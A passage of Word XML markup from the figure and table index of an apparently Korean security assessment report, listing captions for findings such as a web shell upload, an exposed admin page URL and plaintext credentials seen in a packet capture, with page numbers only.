          <w:t>[그림] 77. 업로드된 파일 및 경로 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094650 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="370AD48C" w14:textId="32D9A2A0" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094651" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 78. 업로드된 웹쉘 파일 작동 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094651 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3588DFD1" w14:textId="6578B8BF" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094652" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 79. 메인에서 “쿠폰” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094652 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>63</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EFF3069" w14:textId="38158934" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094653" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 80. 쿠폰 페이지 소스 보기 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094653 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>63</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EF12407" w14:textId="27EB7E29" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094654" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 81. 페이지 소스 내 관리자 페이지 URL 노출</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094654 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0400125D" w14:textId="7487A1D1" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094655" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 82. 관리자 페이지의 쿠폰 관리 페이지로 검증 없이 접근 가능</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094655 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11CD29F8" w14:textId="4C2B0853" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094656" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 83. dirb 도구를 이용해 파일과 폴더 탐색</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094656 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06CFBAB5" w14:textId="3DA4DD8F" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094657" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 84. /File.jsp 파일</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094657 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3A5A4A" w14:textId="0E7E3EA7" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094658" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 85. /js/npm.js 파일</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094658 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BA6ACFC" w14:textId="68531C98" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094659" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 86. ckeditor/README.md 파일</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094659 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2447332A" w14:textId="6D09A522" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094660" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 87. Wireshark에서 현재 연결 중인 네트워크 선택</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094660 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A829026" w14:textId="726F8EF5" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094661" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 88. Wireshark에서 패킷 캡처 준비 중</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094661 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DE0DCFE" w14:textId="0233F92E" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094662" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 89. 계정 로그인 시도</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094662 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>70</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="168AD84A" w14:textId="37A57BCC" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094663" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 90. 사용자 아이디 및 패스워드 평문 노출</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094663 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>70</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67984474" w14:textId="0D0BB429" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094664" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:bCs/>
          </w:rPr>
          <w:t>[그림] 91. 모의 해킹 수행 방법</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094664 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05F6C951" w14:textId="57871179" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795C9B1" w14:textId="77777777" w:rsidR="00D811DC" w:rsidRDefault="00D811DC" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78677E03" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00C90506" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk206602078"/>
      <w:r w:rsidRPr="00C90506">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>표 목차</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="355A3CD1" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B0C6FD" w14:textId="6BEC909C" w:rsidR="00B9713E" w:rsidRDefault="005D30D0">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "[표]" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc209094665" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="003C5FA4">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[표] 1. 진단 대상</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094665 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="0041664A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38CE9B45" w14:textId="30EBD089" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094666" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="003C5FA4">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[표] 2. 진단 일정</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
